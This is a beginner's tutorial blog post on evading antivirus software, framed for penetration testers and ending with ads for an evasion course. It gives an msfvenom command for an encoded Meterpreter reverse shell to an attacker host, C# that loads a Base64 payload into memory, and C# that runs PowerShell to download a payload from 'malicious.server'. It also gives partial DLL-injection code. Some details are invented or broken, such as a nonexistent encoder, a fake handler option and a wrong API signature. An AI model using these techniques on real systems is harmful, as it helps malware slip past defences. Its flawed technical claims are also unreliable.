Antivirus Evasion for Beginners: A Step-by-Step Guide to Bypassing AV for Penetration Testers

What is Antivirus Evasion?

Antivirus Evasion refers to a set of techniques used to bypass the protective mechanisms of antivirus (AV) software, which is designed to detect and prevent malicious activities on a system. For hackers, the ability to evade AV detection is crucial in carrying out undetected attacks, whether it’s for exploiting vulnerabilities, deploying malware, or executing payloads. Here’s how this concept is viewed:

Avoiding Signature-Based Detection: Traditional AV software uses signature-based detection, which compares files and programs against a database of known malware. By modifying the code of the payloads — either through obfuscation, encryption, or polymorphic techniques — hackers can create variants of their malware that don’t match the signatures of known threats. These modifications allow the malware to sneak past signature-based detection.
Bypassing Heuristic and Behavioral Analysis: More advanced AV solutions employ heuristic and behavioral analysis to detect unknown threats by their actions (e.g., file system manipulation, unusual network activity). To bypass these, hackers use living off the land techniques (abusing legitimate system tools like PowerShell, WMI, or other system scripts) to execute payloads in a manner that appears normal. This means executing their malicious code without triggering behavioral flags set by the AV software.
Code Injection and Process Injection: By injecting code into legitimate processes, hackers can bypass AV software’s detection, as the malicious code runs within the context of a trusted process. Techniques like Process Hollowing or Reflective DLL Injection allow attackers to hide the execution of their malicious payload in memory, making it more difficult for AV to detect since no file is written to disk.
Exploiting In-memory Execution: One of the key tactics used by experienced hackers is to avoid touching the disk entirely. By executing payloads directly in memory, attackers can bypass disk-scanning mechanisms of antivirus software. PowerShell or C# scripts can be used to inject code or execute payloads without leaving a trace on the file system, thus avoiding signature and heuristic detection.
Obfuscation and Encoding: By encoding payloads or using obfuscation techniques (e.g., changing variable names or using complex coding structures), hackers make it more challenging for AV systems to recognize malicious code. This is especially effective when combined with custom encoding schemes that are not readily identifiable by AV engines.
Custom Toolkits and Frameworks: Tools like Metasploit, Cobalt Strike, and Veil Framework offer pre-built payloads and encoding schemes designed specifically to evade AV software. Experienced hackers often fine-tune these tools, modifying them for specific environments to maximize their effectiveness against various AV systems. Additionally, custom scripting using languages like Python or C# allows hackers to tailor payloads even further to avoid detection.

Simulating the Target Environment

When preparing for a penetration testing engagement, simulating the target environment in your local setup can be crucial for validating the effectiveness of your attack tools and payloads. However, replicating a target system can be expensive, especially when considering the need to purchase multiple software licenses. Fortunately, there are services that allow penetration testers to test their payloads against multiple antivirus (AV) engines simultaneously, without having to recreate the entire environment.

VirusTotal is one of the most popular services for scanning files against over 50 antivirus engines. While it offers a comprehensive analysis, it has significant limitations from a security perspective. When you upload a file to VirusTotal, the results are shared with all the AV vendors, potentially exposing your tools and techniques before deployment, which could compromise operational security (OpSec). This can be particularly risky for penetration testers who rely on stealth to avoid detection.

AntiScan.Me offers a better alternative for penetration testers concerned about revealing their payloads. Unlike VirusTotal, AntiScan.Me does not share its scanning results with antivirus vendors, maintaining a higher level of confidentiality. While it supports only 26 AV engines and has a limit of three free scans, it allows for paid scans beyond that. While it may not be as comprehensive as VirusTotal, it does provide an effective solution for testing payloads without the risk of disclosing sensitive techniques.

Locating Signatures in Files

Locating signatures in files is a crucial part of both malware analysis and penetration testing, as it helps identify known malicious code or software vulnerabilities. Antivirus engines typically rely on these signatures to detect malicious files and prevent infections. Here’s how signatures are commonly located in files and the methods used to bypass detection:

1. Understanding File Signatures

File signatures are unique sequences of bytes, often referred to as “magic numbers” or “hashes,” that act as identifiers for a particular file type or pattern.
In the context of malware, these signatures are often specific byte sequences or patterns that are recognized by antivirus software to detect known threats.

2. Tools for Locating Signatures

Several tools are used to locate file signatures, particularly when analyzing malware or verifying if a file is benign or malicious:

Hex Editors: Tools like HxD or 010 Editor allow users to open and examine the raw byte content of a file. Analysts can search for known signature patterns, hashes, or specific byte sequences that correspond to particular threats.
VirusTotal: By uploading a file to VirusTotal, which checks files against over 50 antivirus engines, penetration testers can examine if their payloads are being flagged by existing antivirus signatures. VirusTotal provides the MD5, SHA1, and SHA256 hashes for the uploaded files, which can be used to verify whether the file has been previously identified by AV engines.
YARA: This is a tool widely used for creating custom signatures. YARA rules help detect and classify malware based on defined patterns, such as string searches, byte sequences, or file characteristics.
ClamAV: An open-source antivirus engine that allows users to scan files for malware signatures. It’s often used in Linux-based systems but can be integrated into Windows as well.

3. Signature Types

Static Signatures: These are fixed patterns in files (e.g., specific byte sequences) that can be identified by antivirus software. They are often the simplest and quickest form of signature detection.
Dynamic Signatures: These signatures look at the behavior of the file rather than static patterns, analyzing actions like file modification, network traffic, or registry changes.

4. Techniques for Bypassing Signatures

Obfuscation: One of the most common techniques to avoid detection is obfuscating the file or payload. This could include encoding or encrypting the payload to change the file’s byte structure.
Polymorphism: This technique involves changing the appearance of the file each time it’s executed. The core functionality remains the same, but the file structure varies.
Metamorphism: More advanced than polymorphism, metamorphic malware rewrites its code each time it is executed, making it harder for signature-based antivirus systems to detect.

Bypassing Antivirus with Metasploit

Bypassing antivirus (AV) software is a common challenge for penetration testers and ethical hackers when trying to deliver a payload without being detected. Metasploit, a popular penetration testing framework, includes several techniques and modules designed specifically for bypassing AV detection. These techniques allow attackers to evade detection by traditional signature-based detection methods used by most antivirus engines.

Here’s how you can approach bypassing antivirus with Metasploit:

1. Using Metasploit’s Built-In Evasion Features

Metasploit provides several features and payloads that are designed to evade detection by antivirus software. One of the primary tools for bypassing AV detection in Metasploit is its Evasion module.

msfvenom: This tool generates various payloads that can be obfuscated using encoding or encryption. By using payload encoders, msfvenom creates a version of the payload that appears different from its signature but retains the same functionality. Common encoders include shikata_ga_nai, x86/shikata_ga_nai, and x86/varnish.
Shikata Ga Nai: This is a polymorphic XOR encoder that can be used to obfuscate the payload, making it harder for signature-based AV systems to identify it.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -e x86/shikata_ga_nai -f exe > payload.exe

All available encoders:

msfvenom --list encoders 
 
Framework Encoders [--encoder <value>] 
====================================== 
 
    Name                          Rank       Description 
    ----                          ----       ----------- 
 ... 
    x64/xor                       normal     XOR Encoder 
    x64/xor_context               normal     Hostname-based Context Keyed Payload 
Encoder 
    x64/xor_dynamic               normal     Dynamic key XOR Encoder 
    x64/zutto_dekiru              manual     Zutto Dekiru 
    x86/add_sub                   manual     Add/Sub Encoder 
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder 
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder 
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower 
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower 
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR 
Encoder 
    x86/bmp_polyglot              manual     BMP Polyglot 
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder 
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder 
    x86/context_stat              manual     stat(2)-based Context Keyed Payload 
Encoder 
    x86/context_time              manual     time(2)-based Context Keyed Payload 
Encoder 
    x86/countdown                 normal     Single-byte XOR Countdown Encoder 
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR 
Encoder 
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder 
    x86/nonalpha                  low        Non-Alpha Encoder 
    x86/nonupper                  low        Non-Upper Encoder 
    x86/opt_sub                   manual     Sub Encoder (optimised) 
    x86/service                   manual     Register Service 
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder 
    x86/single_static_bit         manual     Single Static Bit 
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase 
Encoder 
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase 
Encoder 
    x86/xor_dynamic               normal     Dynamic key XOR Encoder

2. Using Metasploit’s Evasion Module

Metasploit has a built-in Evasion module that provides options to bypass antivirus detection. This module can help automate the process of obfuscating payloads and bypassing various AV protections.

Evasion Options: The module supports several encoders and allows users to apply additional layers of obfuscation on the payload. You can configure parameters like the output format, encoder, and AV vendor.

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST attacker_ip 
set LPORT 4444 
set Evasion true 
run

3. Metasploit Payloads and Encoding

Certain payloads are better suited for AV evasion due to their design. Meterpreter payloads, for example, are designed with AV evasion in mind and tend to be more successful at evading detection compared to standard reverse shells.

Example Payload: The Windows Meterpreter Reverse TCP payload is popular for its stealth and flexibility in bypassing AV detection. It can be encoded or encrypted to avoid triggering AV signatures.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -e x86/shikata_ga_nai -f exe > payload.exe

4. Using Custom Encoders and Obfuscation

Metasploit allows penetration testers to use custom encoders for more advanced evasion techniques. This involves creating your own encoding methods or utilizing third-party tools to further obfuscate payloads before they are delivered to the target system.

5. Reflection and Process Injection Techniques

In addition to encoding payloads, Metasploit’s post-exploitation modules like Process Injection and Reflective DLL Injection can be used to inject malicious code into running processes without creating new files that antivirus software could detect. These techniques allow attackers to bypass file-based detection mechanisms.

Bypassing Antivirus with C#

C# is typically considered a higher-level language, making it easier to write sophisticated and efficient payloads. It compiles to the .NET Framework, which is trusted by Windows systems, making it less likely to trigger initial alarms. This trust is often exploited by attackers to deliver payloads that are harder for AV tools to detect.

Furthermore, C# allows for the creation of self-contained applications that don’t require external libraries, making detection even harder.

Common Techniques for Bypassing AV with C#

Obfuscation

Obfuscation is one of the primary ways to evade antivirus detection. By changing the structure of the code without altering its functionality, attackers can hide their intent. In C#, obfuscation can involve:

Renaming Variables: Using random or misleading names for variables and functions to make the code harder to understand and analyze.
Control Flow Obfuscation: Modifying the flow of execution without changing the outcome, which confuses AV engines that rely on static analysis to detect known patterns.
String Encryption: Encrypting strings or sensitive data (such as IP addresses or command-and-control server information) so they can’t be easily analyzed by AV tools.

There are several C# obfuscation tools available, such as ConfuserEx and Dotfuscator, which help in obfuscating the code to make reverse engineering difficult.

Using Reflection

Reflection in C# allows the program to inspect and modify its own metadata, which can be useful for loading and executing code dynamically. This means you can load a payload into memory without writing it to disk, making it harder for AV software to detect the malicious file.

using System.Reflection;
byte[] payload = Convert.FromBase64String("Base64EncodedPayload");
Assembly.Load(payload);

Here, the payload is encoded into a Base64 string and then loaded into memory at runtime. This method prevents the AV from detecting the payload on disk, as the code itself is never written to the filesystem.

Leveraging PowerShell

C# can be used to invoke PowerShell commands, which are another method of executing payloads without triggering AV detections. You can embed PowerShell scripts inside a C# application and use System.Management.Automation to execute them. Since PowerShell itself is trusted, using it to run a payload in memory can evade many detection mechanisms.

using System.Management.Automation;
PowerShell ps = PowerShell.Create();
ps.AddScript("Invoke-WebRequest 'http://malicious.server/payload.exe' -OutFile 'payload.exe'");
ps.Invoke();

This technique allows the C# program to download and execute a payload directly from the internet, bypassing traditional signature-based detection mechanisms.

Injecting Code into Running Processes

C# can be used for advanced techniques like code injection, which allows an attacker to inject malicious code into another running process. This is often done through DLL injection, where the attacker loads a dynamic-link library (DLL) into the memory space of another process, such as explorer.exe or svchost.exe. This method can bypass many AV engines, especially if the injection is into a trusted, benign process.

using System.Diagnostics;
using System.Runtime.InteropServices;

public class Injector
{
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr LoadLibrary(string lpFileName);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out uint lpNumberOfBytesWritten);
}

This code demonstrates how to inject a DLL into another process. Once injected, the DLL can execute arbitrary actions without triggering AV detection, as it runs under the guise of a trusted process.

Learn & practice Advanced Evasion Techniques with VeryLazyTech:

E - Book - OSEP OffSec Advanced Evasion Techniques and Breaching Defenses

Topics covered in the Advanced Evasion Techniques and Breaching Defenses PDF (PEN-300)- Operating System and…

buymeacoffee.com

OSEP Pen-300 Videos course

Topics covered in the Advanced Evasion Techniques and Breaching Defenses course (PEN-300) Operating System and…